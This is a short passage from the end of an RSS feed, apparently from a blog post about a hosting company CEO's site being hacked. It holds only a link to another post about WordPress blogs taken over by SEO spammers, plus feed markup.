<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
